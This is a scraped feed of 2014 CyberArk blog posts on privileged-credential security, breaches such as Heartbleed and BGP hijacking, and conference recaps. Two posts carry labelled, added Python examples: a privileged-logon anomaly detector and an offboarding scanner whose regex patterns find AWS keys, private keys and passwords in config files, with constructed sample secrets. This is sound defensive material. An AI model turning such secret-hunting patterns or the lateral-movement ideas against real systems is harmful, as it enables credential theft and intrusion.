There are many ways to move laterally across a network that depend on privileged credential use, including Pass-the-Hash attacks or remote access by stolen/guessed credentials. The latter is more common (Essentia Health is a good example). Where else can an attacker authenticate to once they have a foothold? Here are just a few possibilities:

  • Connections to shared files: enables an attacker access to available information as well as dropping malware onto a shared file
  • Log on to web portals with stolen credentials: enables an attacker to create an infection using the web portal, such as a reference to a malicious website
  • Accessing the Domain Controller: allows for both the extraction and internal reconnaissance information
  • Accessing the Exchange server or any other centralized server: creates an additional attack vector, for example sending an infected update or ‘poisoning’ any user who accesses the server by infecting their machine
  • Access to core infrastructure such as routers: enables an attacker to visualize the network beyond the accessed LAN network, and gain access by using relevant credentials
  • Remote execution of commands: allows the use of relevant credentials and a publicly available tool such as psexec from Microsoft, or a Shell
  • DNS poisoning: enables an attacker to redirect a victim to a different website than the address typed into a browser

These are just a few samples of why privileged credentials are critical to secure and why privilege must come first in every security strategy. Too often, privileged account security is left to the IT department to manage and approached from a compliance mindset.

]]>
Challenging Conventional Wisdom https://www.cyberark.com/blog/challenging-conventional-wisdom/ Tue, 26 Aug 2014 20:16:41 +0000 https://www.cyberark.com/blog//

By John Worrall

Every once in a while, people get shaken from their normal routines and have to question whether what they’ve been doing is still relevant to their current situation. The raft of password-based cyber thefts, for example, has everyone thinking of a better way to manage their credentials.

The truth of conventions and wisdom is that they are fluid and sometimes what was true yesterday may be irrelevant tomorrow. This is where we are today in the security industry and as Gandhi pointed out decades earlier, “It is unwise to be too sure of one’s own wisdom. It is healthy to be reminded that the strongest might weaken and the wisest might err.”

We are fortunate to be living through one of the pivotal moments in the security industry that forces a challenge to conventional wisdom. Here’s my challenge for the industry:

Stop Over-investing in the Perimeter

The perimeter isn’t dead – but it has been proven ineffective at preventing breaches.  Organizations need to stop focusing the lion’s share of effort on security tactics that don’t work. The ‘perimeter’ simply doesn’t matter in the world of advanced attacks such as USIS, P.F. Chang’s, eBay, Heartbleed, Snowden, the retail PoS breaches, and the list goes on. Countless studies point this out, including our own recent research showing that 52 percent of businesses believe hackers are on their network, or have been within the past year.  I argue that the other 48 percent are denying reality.

If the attackers are inside, does it really matter where they came from? Should defense strategies continue to depend on the point of origin? No.

How do attackers live undetected inside a company for weeks, months or years? They steal and exploit valid credentials – a default printer password, a hard-coded password, an employee’s or partner’s credentials, an unprotected hash or some other privileged account. With these in hand, an attacker is able to spiral through a network, hijacking additional accounts and elevating privileges to gain access to vast stores of information, data and control within an organization’s digital repositories.

This transformation of a malicious outsider into a de facto insider enables an attacker to access sensitive assets, install malware and reach the attack goal – all by employing the same permissions and workflows that the organization established for its own, legitimate processes. Prevent this and you take away an attacker’s ability to take control of your very own infrastructure.

The string of recent, high-profile breaches is proof that the bad guys have figured out the perimeter doesn’t matter, so why is it taking so long for the good guys to accept this reality? Resources are already scarce for most organizations so we need to be smarter about how we use them. The first step is to accept tradition isn’t working and agree that it’s time to think unconventionally.

]]>
Passwords14: The Dust Has Settled – What Did We Learn? https://www.cyberark.com/blog/passwords14-dust-settled-learn/ Thu, 21 Aug 2014 14:17:28 +0000 https://www.cyberark.com/blog//

By Shiri Licht

Passwords14 is in the rearview mirror, yet the debate over how we handle passwords rages on. Should we accept weak passwords for trivial use? What action do we take in light of 1.2 billion passwords being stolen by a crime syndicate? How do businesses handle sensitive, privileged account credentials? As our research has shown, privilege-based breaches are now a major influence on larger security strategies.

An interesting approach to the password problem was presented during Passwords14 – the “Pavlovian password management” system. The idea is to provide incentives for users to choose stronger passwords, leading to the creation of a habit that hopefully will last over time.

The core issue tackled in the presentation is the trend for people to use easy-to-remember passwords that they can rely on for an extended period of time. The belief that there are simply too many passwords required for daily life, personal and professional, to not rely on a scheme, puts personal data and business data at risk.

The basic tenet of the Pavlovian method is that the user gets rewarded for good behavior, which is the choice of an effective password. There are a couple of factors at play in what’s considered ‘effective’, including character choice, length, change schedule, etc. Further, these attributes are related. If a password is less complex, the change interval will be shorter. Conversely, as a password gets more complex, the user will need to replace it less frequently. While this is a good start for personal accounts, it is not enough for business use.

Users will be able to game the system. The user will want to get the highest score by creating the strongest password and will get incentives in the form of less frequent requests to replace complex passwords. Yes, this method will (hopefully) lead to the creation of more complex passwords; however, it will exacerbate the memory problem. Password template use will very likely increase as a means to remember these new, longer versions. Or users will write them down. For the same reason, there is also the danger of password reuse across multiple accounts.

Organizations need a better solution to protect key passwords – such as privileged accounts that control the access to their most sensitive assets. An automated password management tool is essential for making privileged account credentials as secure as possible. Once deployed, the level of complexity and randomness of managed passwords becomes much higher than if left to individual choice, while eliminating the memory problem. This also makes it possible to protect the passwords from malware that collects passwords through key logging, screen-capture and other means of intercepting passwords.

]]>
Heartbleed, Again https://www.cyberark.com/blog/heartbleed-again/ Wed, 20 Aug 2014 17:20:00 +0000 https://cyberarkvx2.wpengine.com/blog/heartbleed-again/  

Heartbleed – Conjur’s Response

Earlier this week, news of the massive data breach (~4.5 million records) that hit Community Health Services rippled across the news. The implications are significant: while it is not believed that any healthcare data specifically was taken, the information stolen did constitute PHI, with social security numbers, home phone numbers and addresses, and patient names all stolen. Under HIPAA – a topic we have covered before from a compliance perspective – each of those patients can sue CHS individually; the legal and financial fallout will be complicated and lengthy at best.

Today, Bloomberg is reporting that it appears that this hack was not exclusively the domain of malware, as previously stated. Instead, it appears to have been the result of a specific Heartbleed-related attack.

Citing from the report released this morning: “We never had any tangible proof of an attack until now,” said David Kennedy, founder of TrustedSec LLC, a security consulting company based in Cleveland, Ohio, who first reported Heartbleed was used to attack Community Health on his company’s website. […] The Chinese hackers exploited the Heartbleed flaw to steal user names and passwords to access one of the company’s private communications channels, Kennedy said. The incursion happened about a week after Heartbleed was made public and before Community Health altered its security to reduce its vulnerability, Kennedy said.”

What’s particularly troubling is the speed with which the attack happened; CHS took the appropriate steps, revoking their SSL keys and issuing new ones, but the time window between the announcement of the vulnerability and the response was wide enough for the criminals to get in, steal data, and get out before the mitigation was complete.

Many vendors in the security space will attempt to make hay from this hack. However, we believe that Conjur specifically solves for this type of problem: had CHS “conjurized” their SSL keys, revoking and changing them would have been a process that could have been completed in minutes, not days or weeks. This is, in fact, exactly how many of our customers are approaching their infrastructure moving forwards, precisely to avoid this kind of massive vulnerability and failure.

Don’t fall victim to the next Heartbleed attack. If your infrastructure exists in a regulated industry, or if you’re storing secrets (including SSL certs) in places like git, Puppet, Chef, or Docker images, we can help provide a more automated authz solution, and we can and will find a way to work with your DevOps team to do so. The stakes are simply too high, and too many of these hacks and breaches are occurring to leave the problem unmanaged.

The link below leads to a technical overview of the Conjur platform; if you’re interested in getting your hands on a free trial of Conjur and exploring how it can help with secrets management, drop us a line at info@conjur.net.

]]>
Robbing the Virtual Bank: Privileged Credentials to Blame https://www.cyberark.com/blog/robbing-virtual-bank-privileged-credentials-blame/ Fri, 15 Aug 2014 14:22:38 +0000 https://www.cyberark.com/blog//

The U.S. Consumer Financial Protection Bureau (CFPB) recently issued an advisory on the risk to consumers posed by virtual and cryptocurrencies, like Bitcoin. This warning from the CFPB couldn’t have come at a better time given the growing number of stories we’re seeing on hackers targeting cryptocurrencies.  Andy Greenberg of Wired recently uncovered how a hacker took control of an ISP to steal bitcoins.

According to the researchers Greenberg talked with, “a bitcoin thief redirected a portion of online traffic from no less than 19 ISPs, including data from the networks of Amazon and other hosting services like DigitalOcean and OVH, with the goal of stealing cryptocurrency from a group of bitcoin users.”

The details of the attack are still emerging, however, what is clear is that an employee’s credentials were exploited. It’s not clear if this was done by an outsider, via phishing or by using other techniques, or if this was a malicious insider situation.

The employee’s privileged account credentials were clearly used to perform an attack known as BGP hijacking (border gateway protocol attack), effectively routing the network traffic at the connection points between Internet networks.

In other words, the attacker was able to broadcast a spoofed command that redirected traffic from other networks to a server controlled by him/her. From that server, the hacker sent the mining computers a “reconnect” command and changed the machines’ configurations to deliver the processing power to a pool owned by the attacker.

So what could the ISP have done?  For starters, monitoring the actions and commands sent to the routers at the border gateway could have been helpful in order to detect and prevent this attack.

More importantly, they should have been monitoring the activity of their privileged accounts. This would have enabled them to discover anomalous behavior which could indicate account hijacking or malicious insider activity.

If you’re interested in learning more about how privileged account activity can tip you off to an advanced attack, check out Roy Adar discussing privileged threat analytics.

]]>
Conjur Technical Overview https://www.cyberark.com/blog/conjur-technical-overview/ Thu, 14 Aug 2014 11:53:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-technical-overview/  

Cloud Security and Conjur: Technical Overview

Conjur was designed to provide DevOps and technical organizations with a simple to use, flexible, cloud security and authorization (authz) platform for monitoring, managing, securing, and auditing permissions at scale.

Today, we are releasing a Technical Overview guide that describes:

  • What Conjur is, from both a business and technical perspective
  • How Conjur is most often used by organizations
  • The technical architecture and design for the Conjur platform
  • How to get started using Conjur, whether it’s on bare metal, or with common DevOps tools such as Docker, Chef, SaltStack, Puppet, and Ansible

Ready to learn more about the Conjur platform and how it can help to simplify cloud security and compliance, and provide robust authz for your team? Download the guide now!

Learn how Conjur is built and structured, including most common use cases!
Download the Technical Overview Guide!

]]>
Thursday’s Black Hat Recap https://www.cyberark.com/blog/thursdays-black-hat-recap/ Fri, 08 Aug 2014 18:42:35 +0000 https://www.cyberark.com/blog//

It’s over and we’re a bit sad to leave all the great conversations.  Before we head over to Defcon, we wanted to share some thoughts on Thursday’s Black Hat events. Privileged account security is on everyone’s radar as a critical link in the kill chain against advanced threats. Almost every CISO and security professional that we’ve talked to understands that locking down privileged credentials is critical to protecting the enterprise.

This was reflected in many sessions throughout the conference. From the dangers of privilege escalation to hacking into medical devices and ICS systems through default and hardcoded privileged credentials, there is an ongoing discussion of the role privileged accounts play in advanced attacks. It’s not hard to see why when we’re inundated with breach stories on an almost daily basis. We believe privileged account takeover is the crux of every advanced attack … And no, it’s not just because our purpose in life is to solve the privileged account security challenge.

Bruce Schneier’s Presentation

This session on the evolution of the incident response industry was a must attend. Schneier discussed the importance of an incident response ecosystem that helped businesses deal with the threat landscape and overcome challenges driven by three primary trends:

  1. Companies are Losing Control of their Infrastructure:  Cloud computing, outsourcing, the dissolving perimeter with a mobile workforce – these are all trends that have taken infrastructure control out of the hands of businesses.  As a result, organizations are becoming more reliant on partners and third-parties to protect their own networks and to prevent attackers from using partner networks as backdoors into the primary target network.
  2. Attacker Sophistication:  Schneier made some excellent points on the state of cyber-warfare.  His overall point was that cyber crime as an industry has matured almost as fast as the security industry.  We’re seeing attackers use war-like tactics to perpetrate their attacks, with the biggest difference being that in a ‘traditional’ war, you can usually tell who the enemy is by the weapons they use.  This isn’t the case in the cyber-world, where states and rogue actors are releasing sophisticated malware and cyber-weapons and making them available to a growing percentage of attackers. His inescapable point was that the sophistication has reached the level where it is impossible to keep motivated attackers or groups out of your network.
  3. Government Involvement:  The growing number of state-sanctioned hacker groups has driven an increasingly menacing threat landscape.  We’re in the middle of a cold-war arms race, except nations are stockpiling zero-day exploits, vulnerabilities, and nasty malware for when the time is right to strike.

So what does this have to do with incident response, and more specifically, privileged threat analytics?  The point was that the need for real-time incident response has never been greater.  While a lot of the process and information gathering can be automated, there needs to be a human element to intellectually figure out what the right response should be.

Schneier believes that the human component of incident response must be fueled with information on the methods attackers use to infiltrate an organization and exfiltrate data.  This is where privileged threat analytics comes in. Real-time analytics on the anomalies of privileged user behavior will be a critical driver in the incident response industry, providing the IR teams with the information and insight needed to get ahead of attackers that may already be on the network.

This is our contribution to the industry and we’re focused entirely on finding innovative ways to disrupt the ‘privileged pathway’.

]]>
Wednesday’s Black Hat Recap https://www.cyberark.com/blog/wednesdays-black-hat-recap/ Thu, 07 Aug 2014 14:29:59 +0000 https://www.cyberark.com/blog//

We’re at Black Hat this week sharing in the discussion on the biggest trends and happenings in the cyber security world.  So far, it’s been a great show with a lot of activity. Here are a few items of note from the show floor and from some of the great presentations.

Russian Cyber-gangs Amass More than a Billion User Credentials:

The New York Times broke the story right before the show opening that new research shows that Russian cyber gangs, dubbed CyberVor, have amassed about 1.2 billion user credentials from across thousands of websites.  This has generated a lot of discussion at the event – from if this is legit, to support for the researcher who refuses to provide the world with details – however, there’s little concern from the security community itself. The main takeaway from people we’ve talked to is that this is just the latest in a series of password dumps that continue to happen with greater frequency – and emphasizes the problems that plague password security.

The reality is that we won’t be able to get rid of passwords until a more secure and user-friendly authentication mechanism is available. Even then, we’ll still have all the legacy systems to contend with that do not support any other authentication method. What CyberVor really tells us is that the immediate problem is with password re-use. If you do the math, the number of credentials stolen divided by the number of sites they were taken from, shows that people continue to re-use passwords across properties.

It will take some time for service providers to employ secure salted hashing schemes that will make it more difficult for attackers to get to the actual passwords.  While it’s critical that organizations roll out automated systems to secure the credentials for their sensitive assets, it’s imperative that we also start educating people about the dangers of password re-use and identity theft.

Retail/PoS Breaches Dominate

The sessions looking at PoS attacks have been standing room only – they serve as a microcosm of the problems that plague the industry. As highlighted in our recent survey, PoS attacks have changed security policy more than any other attack except the NSA/insider breach.  Attackers are infiltrating these networks either through direct attacks like phishing, or by attacking a third-party vendor’s connection to the target company’s network. However, the real flashpoint occurs once the attackers get inside: the theft of insider credentials, which gives them the ability to implant malware directly in the pathway of user financial information.

Latest Attacks and Malware are Dependent on Privileged/Insider Credentials

There have been a lot of great sessions focusing on the newest and most virulent forms of malware, the latest phishing schemes, and how attackers can infiltrate corporate systems through connected devices like VoIP phones and copiers.

What’s missing from these conversations is the fact that attackers need privileged and insider credentials to allow these attacks to do damage or move beyond the device itself. A case in point is Dan Munro’s piece on multi-function printers in healthcare organizations. It’s a must read if you think printers are not an important access point to lock down. Whether it’s default passwords in connected devices or the use of insider credentials to install malware, businesses need to focus on the mechanism attackers are using to actually carry out their attacks.

The Best is Yet to Come

Our very own Andrey Dulkin will be giving a session tomorrow on Pass-the-Hash attacks – a must see! He’ll use proprietary research from multiple in-use networks to demonstrate just how prevalent and easy to find hashes are on a network. Of course, he’ll also talk about how you can prevent hackers from finding your hashes before you have a chance to lock them down.

]]>
Recap: HackSurfer Hangout with Kevin O’Brien https://www.cyberark.com/blog/recap-hacksurfer-hangout-with-kevin-obrien/ Thu, 07 Aug 2014 14:58:00 +0000 https://cyberarkvx2.wpengine.com/blog/recap-hacksurfer-hangout-with-kevin-obrien/  

Code Spaces, Cloud Security, and Conjur

Earlier today, Kevin O’Brien was live on a HackSurfer Hangout with Jeff Peters, discussing cloud security and cloud authorization. Miss it? No problem! Check out the archived copy below!

In this 30-minute Q&A session, Kevin and Jeff talked about the Code Spaces shutdown, DevOps and its implications for security, compliance, and auditing, and the continuing shift of “real” applications to the cloud.

Join the discussion! Contact us with any questions and get started with Conjur today!

]]>
Live Hangout with Kevin O’Brien https://www.cyberark.com/blog/live-hangout-with-kevin-obrien/ Thu, 07 Aug 2014 12:16:00 +0000 https://cyberarkvx2.wpengine.com/blog/live-hangout-with-kevin-obrien/  

AWS Hacked? Not quite.

When Code Spaces went down in less than 48 hours, it was a big hit to the cloud technology sphere. Was AWS hacked? Not quite.

Code Spaces’ ordeal began with a DDoS attack against its servers, accompanied by an extortion demand: the attacker had also gained access to Code Spaces’ Amazon EC2 control panel and demanded payment to go away. When Code Spaces tried to retake the account by changing passwords, the attacker, who had already created backup logins to the panel, deleted most of Code Spaces’ and their clients’ data and backups, forcing a complete and permanent shutdown of Code Spaces.

We wrote about the Code Spaces situation shortly after the details were released. We stressed the need for least privilege as the basis of cloud infrastructure, segmentation of data, and simple access-intelligence controls.

On August 7, our own Kevin O’Brien will be joining HackSurfer to do a live hangout Q&A regarding Code Spaces, DevOps, the Cloud, and Infosec. Please join us! You can watch live (August 7th, 1:00-1:30pm EST) by signing up on the HackSurfer page, or any time afterwards from the HackSurfer archives.

We look forward to hearing from and chatting with you!

 

]]>
Authz as a Service: Automate. Automate. Automate. https://www.cyberark.com/blog/authz-as-a-service-automate-automate-automate/ Mon, 04 Aug 2014 12:21:00 +0000 https://cyberarkvx2.wpengine.com/blog/authz-as-a-service-automate-automate-automate/  

Authz as a Service

One of the ideas that underpins the entire DevOps movement, from Chef to Puppet, Ansible to Docker, is the idea that the age of automation has arrived. The promise of automation is that users of these new toolchains can make user management and authorization (“authz”), server creation and deprovisioning, and policy changes simple, repeatable, and, most importantly, automated throughout their entire infrastructure.

As Werner Vogels, CTO of Amazon, put it back in 2012: “Automate your application and processes; humans are terrible at automation.”

He was not kidding.

Humans tend to be inefficient and error-prone when performing repetitive tasks, and ergonomics studies suggest that even on a biomechanical level, the human body is not well conditioned for repeating the same motions over and over again — take, for example, the repetitive motion injuries seen in workers from Ford’s assembly line. The consequences of these errors tend to be magnified in environments where speed is enhanced by machines; a misconfigured access right may be relatively innocuous when it only impacts a single user or machine, but with the modern cloud-based infrastructure stack, that error is apt to be replicated to dozens or even hundreds of servers.

DevOps practitioners are a growing group of people working to automate operations and reduce the number of preventable accidents by using trusted images, tools like the ones listed above, and better predictive design in the compliance realm. Accordingly, many are turning to Conjur to help them implement authorization-as-a-service, with which they can define a single set of rules and permissions and allow them to propagate across their environments seamlessly and correctly.

If you’re looking to understand and improve authz for your own DevOps team or project, we can help! The easiest way to get started is simply to roll out a trial appliance; doing so is as easy as signing up.

]]>
Mitigation Techniques for Energetic Bear https://www.cyberark.com/blog/mitigation-techniques-energetic-bear/ Fri, 01 Aug 2014 20:40:05 +0000 https://www.cyberark.com/blog//

By Shiri Licht

In the last post, we talked about Energetic Bear, also known as Dragonfly, a suspected series of attacks by a group of Russian hackers who have been in operation since at least 2011 and have mainly targeted the energy sector and related industries. In that post, our research team at CyberArk Labs dissected how the Energetic Bear attackers used the privilege escalation pathway to make themselves de facto “insiders” on a network. In this post, we’ll discuss mitigation techniques.

Mitigation Techniques:

There are ways that these types of attacks can be mitigated. By protecting privileged credentials, organizations can prevent the attackers from operating inside the network, even if the attackers are successful in their initial breach, stopping the attack before it reaches its actual goal. As attackers are looking to hijack and exploit privileged credentials to operate in the network, here are some techniques that can be used in isolation or as part of a comprehensive privileged account security strategy:

  • Implement a jump server so that privileged credentials never reside on endpoint machines; an attacker who compromises an endpoint then has nothing to hijack and no direct path to sensitive assets.
  • Monitor privileged account activity to learn what normal privileged behavior looks like in your network, and alert on deviations from it that may indicate malicious activity.
  • Use an automated password management solution so that passwords are never typed or displayed when connecting to systems in the network; attackers then cannot recover them from screenshots or keyloggers (which is exactly what Karagany collected).
  • Use a credential management system that generates random, complex and unique passwords and rotates them according to your organizational policy. Unique, random passwords defeat guessing and brute-force attacks and stop one stolen password from opening other systems; rotation limits how long a stolen credential remains useful.
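
Added example (not from the original post): the second bullet in practice, a small baseline-and-anomaly scorer for privileged logon events. It learns which privileged accounts reach which hosts, from where and at what hours during a training window, then flags later events that use a new target, a new source or an unusual hour, and ignores non-privileged accounts. The record format, account names, hostnames and timestamps are constructed; in a real deployment the events would come from Windows 4624 logs or a session manager, and the privileged set from the vault’s inventory.

```python
"""Baseline-and-anomaly check over privileged logon events.

Added example, not code from the original CyberArk post. It implements the
"monitor privileged account activity" bullet above: a baseline of which
privileged accounts reach which hosts, from where and at what hours is learned
from a training window, and later events are scored against it. All accounts,
hostnames and timestamps below are constructed.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Accounts whose activity we care about (assumption: tagged by naming convention
# or pulled from the vault's inventory; here simply hard-coded).
PRIVILEGED = {"admin_db", "svc_backup", "administrator"}


@dataclass(frozen=True)
class Logon:
    when: datetime
    account: str
    source: str
    target: str
    logon_type: int  # Windows 4624 semantics: 10 = RDP, 3 = network


def parse(line: str) -> Logon:
    """Constructed record format: '<iso-time> <account> <source> -> <target> type=<n>'."""
    ts, account, source, _, target, lt = line.split()
    return Logon(datetime.fromisoformat(ts), account, source, target, int(lt.split("=", 1)[1]))


def learn(events) -> dict:
    """Per-account sets of targets, sources and hours seen during the baseline window."""
    base = defaultdict(lambda: {"targets": set(), "sources": set(), "hours": set()})
    for e in events:
        base[e.account]["targets"].add(e.target)
        base[e.account]["sources"].add(e.source)
        base[e.account]["hours"].add(e.when.hour)
    return base


def _hour_distance(a: int, b: int) -> int:
    """Circular distance on a 24-hour clock, so 23:00 and 00:00 are one hour apart."""
    d = abs(a - b)
    return min(d, 24 - d)


def score(e: Logon, base: dict) -> list[str]:
    """Return the reasons an event deviates from baseline (empty list = normal)."""
    if e.account not in PRIVILEGED:
        return []
    b = base.get(e.account)
    if b is None:
        return ["privileged account never seen in baseline"]
    reasons = []
    if e.target not in b["targets"]:
        reasons.append(f"new target {e.target}")
    if e.source not in b["sources"]:
        reasons.append(f"new source {e.source}")
    if all(_hour_distance(e.when.hour, h) > 1 for h in b["hours"]):
        reasons.append(f"unusual hour {e.when.hour:02d}")
    return reasons


def detect(baseline_lines: list[str], new_lines: list[str]) -> list[tuple[str, list[str]]]:
    """Learn from baseline_lines, then return (line, reasons) for every flagged new line."""
    base = learn(parse(line) for line in baseline_lines)
    flagged = []
    for line in new_lines:
        reasons = score(parse(line), base)
        if reasons:
            flagged.append((line, reasons))
    return flagged


# Constructed sample data: a week of normal activity, then one day to score.
BASELINE_LINES = [
    "2014-07-21T09:02:00 admin_db JUMP-01 -> DB-01 type=10",
    "2014-07-22T10:15:00 admin_db JUMP-01 -> DB-01 type=10",
    "2014-07-24T14:40:00 admin_db JUMP-01 -> DB-02 type=10",
    "2014-07-21T23:00:00 svc_backup BKP-01 -> FS-01 type=3",
    "2014-07-22T23:00:00 svc_backup BKP-01 -> DB-01 type=3",
    "2014-07-23T08:30:00 alice WS-17 -> FS-01 type=3",
]
NEW_LINES = [
    "2014-07-31T09:30:00 admin_db JUMP-01 -> DB-01 type=10",      # normal
    "2014-07-31T02:13:00 admin_db WS-17 -> DB-01 type=10",        # workstation, 2am
    "2014-07-31T23:05:00 svc_backup BKP-01 -> DC-01 type=3",      # backup account on a DC
    "2014-07-31T03:00:00 alice WS-17 -> FS-01 type=3",            # not privileged, ignored
    "2014-07-31T11:00:00 administrator WS-17 -> DC-01 type=10",   # never seen before
]

if __name__ == "__main__":
    for line, reasons in detect(BASELINE_LINES, NEW_LINES):
        print(line, "=>", "; ".join(reasons))
```

Run as a script it prints the three flagged events; the one that matters for this post is the database administrator account arriving from a workstation at 02:13, which is how stolen credentials tend to look the first time they are used.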

Critical infrastructure will always be a top target in nation state-sponsored attacks. Energy companies and other critical infrastructure organizations need to take steps to better secure their ICS by locking down privileged accounts and preventing outside attackers from becoming privileged insiders.

]]>
It’s 11pm. Do you know where your credentials are? https://www.cyberark.com/blog/its-11pm-do-you-know-where-your-credentials-are/ Wed, 30 Jul 2014 12:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/its-11pm-do-you-know-where-your-credentials-are/  

The Cloud Credential Conundrum

We’ve all been there. You have an urgent project and need to hire a consultant with a specific skill set to get it done. You go through the interview and hiring process, get them onboarded, and grant them access to your systems. Keys get assigned, and since you have a top-notch DevOps team, everything is automated with Chef, SaltStack, Puppet, and Ansible.

Your hired gun completes their tasks and you part ways; they pack up and head out, on to their next gig.

But wait, did you deprovision them? Can you deprovision them? Do they still have viable credentials to your system? Are those credentials still sitting in a git repo or a configuration management tool image somewhere?

Deprovisioning users and managing authn and authz, whether for ex-employees, employees whose roles change, or even code written by contractors and left running in your infrastructure, needs to be simple, efficient, and handled with discipline. This is a common problem area, from the tiny start-up to the enterprise, but it is rarely on the security radar, even though lingering insider access is one of the most prevalent causes of long-term compliance and security issues.


If you shared credentials with the consultant, revoking them risks breaking a dozen other users’ logins and flooding your IT team with emails at 9am Monday morning. If you gave them their own set of credentials, you need to make sure every one of them is shut off.

User access control is not only good housekeeping; it is a mandated control under a number of regulatory regimes. An example of such a control is IAM-11 (Identity and Access Management: User Access Revocation) in the Cloud Security Alliance’s Cloud Controls Matrix, which maps to HIPAA / HITECH 45 CFR 164.308(a)(4)(ii)(A) and states:

Timely de-provisioning (revocation or modification) of user access to data and organizationally-owned or managed (physical and virtual) applications, infrastructure systems, and network components, shall be implemented as per established policies and procedures and based on user’s change in status (e.g., termination of employment or other business relationship, job change or transfer). Upon request, provider shall inform customer (tenant) of these changes, especially if customer (tenant) data is used as part the service and/or customer (tenant) has some shared responsibility over implementation of control.

(For more HIPAA compliance regulations, see our Guide to HIPAA Cloud Compliance)

Of course, it should not be just the user who needs to be deprovisioned, but also their active and non-active scripts in your infrastructure. Each script should be checked and certified, before being reassigned to a different employee.

Achieving credential management visibility is vital for proper system security and proof of access control, without burdening your engineering, IT, or devops teams.
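
Added example (not code from the original post): an offboarding check for the questions raised above. It lists SSH keys on a host whose comment does not name someone on the active roster, and scans configuration-management and repository files for static secrets the departed contractor could have copied. Everything in it is constructed: the roster, the authorized_keys content, the file paths, the password, and the AWS values (which are Amazon’s documented example credentials, not live keys).

```python
"""Offboarding check: what can a departed contractor still use?

Added example, not code from the original post. It answers the two questions
above on constructed inputs: are the contractor's SSH keys still authorised on
a host, and did static secrets they could have copied end up in configuration
management or repository files? Every path, user name, key and secret below is
invented (the AWS values are Amazon's documented example credentials).
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# --- constructed inputs ------------------------------------------------------
ACTIVE_ROSTER = {"alice", "bob"}  # contractor "carol" has rolled off

AUTHORIZED_KEYS = """\
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7alice alice@laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBobbbbb bob@desk
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICarolll carol@contractor
"""

REPO_FILES = {
    "cookbooks/app/attributes/default.rb": (
        "default['app']['db_password'] = 'hunter2'\n"
        "default['app']['aws_key'] = 'AKIAIOSFODNN7EXAMPLE'\n"
    ),
    "ansible/group_vars/all.yml": (
        "region: us-east-1\n"
        "aws_secret_access_key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "README.md": "Run `make deploy` after exporting AWS_PROFILE.\n",
}

# Patterns for the secret types most often left behind in CM code. The last
# group of each pattern (or the whole match) is the secret itself.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\s*[:=]\s*['\"]?([A-Za-z0-9/+=]{40})"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "password_assignment": re.compile(
        r"(?i)(password|passwd|pwd)\W{0,3}[:=]\s*['\"]([^'\"\s]+)"),
}


@dataclass(frozen=True)
class Finding:
    path: str
    kind: str
    line: int
    evidence: str  # first characters only; never log the whole secret


def stale_authorized_keys(authorized_keys: str, active_roster: set[str]) -> list[str]:
    """Comment field of every key whose owner (the 'user' in 'user@host') is not
    on the active roster. Keys without a comment are reported too: nobody can
    vouch for them, so they should be removed or re-attributed."""
    stale = []
    for line in authorized_keys.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        comment = parts[2] if len(parts) > 2 else ""
        owner = comment.split("@", 1)[0]
        if owner not in active_roster:
            stale.append(comment or "<no comment>")
    return stale


def scan_for_secrets(files: dict[str, str]) -> list[Finding]:
    """Run every pattern over every line of every file."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            for kind, pat in SECRET_PATTERNS.items():
                m = pat.search(line)
                if m:
                    secret = m.group(m.lastindex or 0)
                    findings.append(Finding(path, kind, lineno, secret[:4] + "..."))
    return findings


def offboarding_report() -> dict:
    """Two lists for the offboarding ticket: keys to remove, secrets to rotate.
    Rotation, not deletion, is the fix for the second list: removing a secret
    from git does not make a former contractor forget it."""
    findings = scan_for_secrets(REPO_FILES)
    return {
        "stale_keys": stale_authorized_keys(AUTHORIZED_KEYS, ACTIVE_ROSTER),
        "leaked_secrets": [(f.path, f.line, f.kind, f.evidence) for f in findings],
        "rotate": sorted({f.kind for f in findings}),
    }


if __name__ == "__main__":
    for k, v in offboarding_report().items():
        print(k, v)
```

The second list is a rotation list, not a deletion list: removing the database password from the cookbook does not make the person who read it forget it, and the git history still contains it.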

 

 

]]>
CyberArk 2014 Global Advanced Threat Landscape https://www.cyberark.com/blog/cyberark-2014-global-advanced-threat-landscape/ Tue, 29 Jul 2014 14:43:02 +0000 https://www.cyberark.com/blog//

Yesterday’s release of the CyberArk advanced threat survey marks the eighth year in a row we’ve surveyed business and IT leaders to better understand what cyber security issues are top of mind for practitioners around the world. The 2014 survey can be downloaded here, although if you want a quick read, here are the highlights:

Snowden and Retail/PoS Breaches Influence Security Strategies the Most
We asked the respondents to select which cyber-attacks had the biggest impact on their business’ security strategy. Not surprisingly, 68 percent of respondents said the NSA and the PoS attacks at several high-profile retailers were the top two on the list.

[Chart: which type of breach most influenced respondents’ security strategy]

While the NSA breach is widely regarded as the prototypical insider-based attack, and the retail/PoS breaches are regarded similarly for outside attacks, the critical link between both attacks was the compromise and exploitation of privileged credentials.

Third-Party Privileged Access Emerges as Critical Security Vulnerability
Companies continue to provide routine network access to make it easier for partners, vendors and other trusted third-parties to provide services. While this certainly streamlines the supply chain, the bad guys are using this route to go after these partners to steal and exploit their privileged access to the target company’s network.

And what do businesses say about this? They have little confidence that their third-party vendors are properly locking down and securing privileged access to their networks.

[Chart: third-party vendors with privileged access to the network]

[Chart: confidence that third-party vendors secure their privileged access]

Attackers are on the Inside – Protect Your Privileges
Last year we found that 52 percent of companies thought that their network had either been breached in the last 12 months, or that an attacker was currently on their network. We asked the same question again this year to see if things got better, but turns out the issue is in the same place – 52 percent said yes again this year. (Maybe the other 48 percent just won’t admit it …)

The reality is, no matter how tight your security is, motivated attackers will find a way onto your network. Once they’re on the network, things can get ugly. As you can see from the chart below, the majority of organizations surveyed believe that attacks that reach the privileged account takeover stage are the most difficult to detect, respond to and stop. Once an attacker gains de facto insider status, a breach is incredibly hard to stop without the right tools in place.

